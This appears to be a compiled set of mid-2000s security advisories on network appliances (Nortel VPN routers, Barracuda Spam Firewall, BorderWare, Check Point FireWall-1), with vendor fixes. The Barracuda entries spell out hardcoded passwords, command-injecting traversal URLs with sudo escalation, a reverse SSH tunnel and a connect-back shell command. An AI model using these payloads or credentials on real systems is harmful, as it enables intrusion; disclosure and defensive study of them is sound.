http://secunia.com/advisories/24962/
Description:
A vulnerability and a security issue have been reported in Nortel VPN Routers, which can be exploited by malicious people to bypass certain security restrictions or manipulate certain data.
1) Two default user accounts ("FIPSecryptedtest1219" and "FIPSunecryptedtest1219") are configured on the VPN Router, which are not readily visible to the system manager. These can be exploited to gain unauthorized access to the private network.
2) Missing authentication checks within two template files of the web management tool can be exploited to e.g. modify certain router configurations.
An issue regarding same DES keys used to encrypt user's passwords has also been reported, which can facilitate brute-force attacks on user's passwords if the attacker were to gain access to the LDAP store.
The vulnerability and security issue reportedly affect the following products:
* Contivity 1000 VPN Switch
* Contivity 2000 VPN Switch
* Contivity 4000 VPN Switch
* VPN Router 5000
*VPN Router Portfolio
Solution:
Update to versions 6_05.140, 5_05.304, or 5_05.149.
Provided and/or discovered by:
The vendor credits
Detack GmbH.Labels: Advisory, Appliance, Backdoor, Insecurity, Vulnerability
Barracuda Networks Spam Firewall Multiple Vulnerabilities Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001
Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.
A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.
-------
Matthew Hall (lists ecsc co uk)
Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006
Summary:
Lack of input sanitisation in the Barracuda spam firewall
web interface allows execution of commands by unauthenticated users.
Combined with priviledge elevation techniques, execution of commands as
the root user is possible allowing a full system compromise.
Details:
In a follow-up investigation to bid 19276 - 'Barracuda Vulnerability:
Arbitrary File Disclosure [NNL-20060801-02]' by Greg Sinclair, further
investigation was performed by the Internet Defence Security Team and
several extra vulnerabilities were discovered, which when leveraged with
privilege escalation techniques allowed the remote execution of commands
as the root user without any authentication.
The original discovery by Greg Sinclair showed that it was possible to
open arbitrary files, either owned by the user/group 'nobody:nogroup' or
with world-read access, through the web interface using a path
sanitation vulnerability in preview_email.cgi, e.g:
https://
/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/back
up/periodic_config.txt.tmp
Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.
Using this vulnerability, it is also possible to use the pipe character
(|) to redirect the stdout of any programs run, to the stdin of the file
open function to print the output of the command back to the web
interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/l
s%20-la%20/|
It was then possible to leverage further privileges, as the user the
http daemon runs as (nobody), is granted root level access to several
system commands via the use of sudo, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/sudo%20touch%20/foo|
(Repeating the previous command should then show that the file 'foo' has
been created with root permissions in '/').
The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(aswell as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)
Access to such commands as a chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the webinterface, without the use
of sudo, and would run with root priviledges.
As such, a complete system compromise is possible remotely through the
web interface without any authentication.
It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' a hardcoded 'guest' user password existed,
which was 'bnadmin99'.
During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If this case is true, then it is possible to login to the web interface
as the admin user using the password 'adminbn99'.
In order to gain elevated privileges to login to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.
It was possible to expose the ssh rsa public key, which then could be
copied to a users' '.ssh/authorized_keys2' on a local machine, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/c
at%20/home/emailswitch/code/config/id_rsa.pub|
With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:loca
lhost:443%20@|
It was them possible to login to 'https://127.0.0.1:8080/' with the
username of 'admin' and password of 'adminbn99' and manage the device as
an administrator.
It was noted that the original file input sanitation vulnerability seems
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.
So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remains the same.
Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.
The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.
Exploit
Attackers can exploit these issues via a web client.
The following proof-of-concept URI is available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl
Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.Labels: Appliance, Email, Spam, Vulnerability
Barracuda Spam Firewall default account
gssinclannlsoftware.com
Date: Tue Aug 01 2006 - 16:18:15 CDT
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Title: Barracuda Hardcoded Password Vulnerability
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair (gssinclannlsoftware.com)
Discovered on: 28 May 2006
Overview:
Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to information disclosure which is made possible by a default guest password
Details:
The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 have a hardcoded password for the "guest" account in the Login.pm script. This script is called to validate any user who attempts to login to the barracuda's web interface (typically at http://
:8080 or https://). While the guest account has limited access, the following information can be obtained:
* system configuration including IP accesses, admin IP ACLs
* email message logs (but not the content of the messages)
* version information of both spam/antivirus definitions and system firmware version
Used in conjunction with the vulnerability "Barracuda Arbitrary File Disclosure" (NNL-20060801-02), the integrity of the system can be compromised. An attacker can use both vulnerabilities to download both confidential emails as well as the configuration information (including the admin password).
Additionally, while some accounts such as "admin" are bound by user definable IP ACLs, the guest account is not. This means that sensitive information can be disclosed to ANY IP address regardless of the user defined network restrictions.
Proof of Concept:
Enter the username "guest" into the login page of any open barracuda and the password "bnadmin99"
Recommendations:
* Never allow your Barracuda web interface to be accessible from untrusted networks (especially the Internet)
* Upgrade to version 3.3.0.54 or later
Vendor Contact:
29 May 2006 - Initial Vendor Contact
24 June 2006 - Vendor replies with prospect of fix
17 July 2006 - NNL request status update, no reply
01 Aug 2006 - NNL releases vuln report, notifies vendor of releaseLabels: Advisory, Appliance, Email, Spam, Vulnerability
Jean-Sébastien Guay-Leroux jean-sebastien at guay-leroux.com
Tue Apr 4 00:51:17 BST 2006
Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: Barracuda Networks
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.10045
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:
* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.
Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.
For further informations about the details of the bugs, you can consult OSVDB
#5753 and #5754 .
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.
It is recommended to update to firmware #3.3.03.022 .
VI. CREDITS
Ulf Harnhammar who found the original LHA flaw.
Jean-Sébastien Guay-Leroux who conducted further research on the bug
and produced exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public
Labels: Appliance, Bug, Spam, Vulnerability
OSVDB ID: 23939
Disclosure Date: Mar 17, 2006
Description:
BorderWare MXtreme contains a flaw related to the web administration interface. No further details have been provided.
Vulnerability Classification:
Remote/Network Access Required
Unknown Attack Type
Loss Unknown
Exploit Unavailable
Verified
Web Related
Products:
BorderWare Technologies Inc. MXtreme Mail Firewall 5.0
BorderWare Technologies Inc. MXtreme Mail Firewall 6.0
Solution:
Apply the patch provided by BorderWare, as it has been reported to fix this vulnerability. In addition, the vendor recommends disabling HTTP/HTTPS login access until patches can be applied.
External References:
CVE ID: 2006-1254
National Vulnerability Database: CVE-2006-1254
Bugtraq ID: 17140
Secunia Advisory ID: 19223
Security Tracker: 1015787
FrSIRT Advisory: ADV-2006-0972
Credit:
OSVDB does not have information on who discovered this vulnerability. If you have credit information please send it to OSVDB Moderators
Labels: Advisory, Appliance, Bug, Vulnerability
Barracuda Spam Firewall Hashed Password Disclosure
OSVDB ID: 20879
Disclosure Date: Nov 16, 2005
Description:
Barracuda Spam Firewall contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an end user interacts with the system, which may disclose the user's encoded password in the URL. The encoded password is transmitted without the protection of SSL encryption, but would require an attacker to sniff the connection to obtain the information.
Vulnerability Classification:
Remote/Network Access Required
Cryptographic Attack
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern
Products:
Barracuda Networks Barracuda Spam Firewall 3.1.17
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
External References:
Related OSVDB ID:
20878Vendor: Barracuda Networks
Other Advisory URL: http://osvdb.org/ref/20/20879-barracuda.txt
Credit:
security curmudgeon -
attrition.orgLabels: Advisory, Appliance, Email, Spam, Vulnerability
------------------------------------------------------------------------
Inside Security GmbH Vulnerability Notification
Revision 1.6 2001-07-14
------------------------------------------------------------------------
The latest version of this document is available at
http://www.inside-security.de/fw1_rdp.html
The proof of concept code is available at
http://www.inside-security.de/fw1_rdp_poc.html
-----------------------------------------------
Check Point FireWall-1 RDP Bypass Vulnerability
-----------------------------------------------
Summary:
It is possible to bypass FireWall-1 with faked RDP packets if the default implied rules are being used.
RDP (Reliable Data Protocol, but not the one specified in RFCs 908/1151, a Check Point proprietary one) is used by FireWall-1 on top of the User Datagram Protocol (UDP) to establish encrypted sessions.
FireWall-1 management rules allow arbitrary eitherbound RDP connections to traverse the firewall. Only the destination port (259) and the RDP command are verified by FireWall-1. By adding a faked RDP header to normal
UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall.
Implied rules can't be easily modified or removed (except all together) with the FireWall-1 policy editor.
Impact:
Given access to hosts on both sides of a firewall a tunnel to bypass the firewall could be built using this vulnerability. Such access could be gained with a trojan horse that uses this vulnerability to connect from the inside back to the machine of the attacker. But also arbitrary connections from the outside to machines behind the firewall (even if they are supposedly totally blocked from the in- and outside by the firewall) can be established, for example to communicate with infiltrated programs like viruses.
Affected systems:
Check Point VPN-1(TM) & FireWall-1(R) Version 4.1
Releases tested:
Build 41439 [VPN + DES]
Build 41439 [VPN + DES + STRONG]
Build 41716 [VPN + DES + STRONG] (SP2)
Vendor status:
The vulnerability has been reported to Check Point and a fix is scheduled for today [2001-07-09]. We want to thank Check Point Software Technologies for their quick reaction.
Detailed description:
As FireWall-1 rulesets are created they are translated into the INSPECT language (similar to C) and by default include the file $FWDIR/lib/base.def which itself includes $FWDIR/lib/crypt.def in line 259. Together they define
protocol names and the so called implied rules (for FireWall-1 management). In line 62 the macro accept_fw1_rdp is defined to accept any eitherbound connection that matches the following characteristics:
- Protocol UDP
- Destination port 259 (RDP)
- RDP Command RDPCRYPTCMD (100), RDPCRYPT_RESTARTCMD (101),
RDPUSERCMD (150) or RDPSTATUSCMD (128).
The RDP command types RDPCRYPT = {RDPCRYPTCMD,RDPUSERCMD,RDPSTATUSCMD} and RDPCRYPT_RESTART = {RDPCRYPT_RESTARTCMD} will permit traversal of faked RDP packets (regardless of the value of NO_ENCRYPTION_FEATURES, undefined by default).
Proof of concept code:
Proof of concept code has been submitted to Check Point. We are planning to make this code publicly available within a few days.
[ Updated 2001-07-13: Proof of concept code was released:
http://www.inside-security.de/fw1_rdp_poc.html ]
Suggested workarounds:
- Comment line 2646 of base.def ( accept_fw1_rdp; )
- Deactivate implied rules in the Check Point policy editor (and build
your own rules for management connections).
- Block UDP traffic to port 259 on your perimeter router.
Solution:
Apply the fix available from Check Point:
http://www.checkpoint.com/techsupport/alerts/rdp.html
Credits:
This vulnerability was found and documented by Jochen Thomas Bauer
and Boris Wesslowski
of Inside Security GmbH, Stuttgart, Germany.
------------------------------------------------------------------------
(C) 2001 Inside Security GmbH
This notice may be redistributed freely provided that redistributed copies
are complete and unmodified, and include all date and version information.
ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES,
INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED
AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
IN NO EVENT WILL INSIDE SECURITY GMBH BE LIABLE FOR ANY LOST REVENUE,
PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL
OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF
LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION
CONTAINED IN THIS SECURITY BULLETIN, EVEN IF INSIDE SECURITY GMBH HAS
BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable
law, void, or unenforceable in any jurisdiction, then such provisions are
waived to the extent necessary for this disclaimer to be otherwise
enforceable in such jurisdiction.
------------------------------------------------------------------------Labels: Advisory, Appliance, Firewall, Vulnerability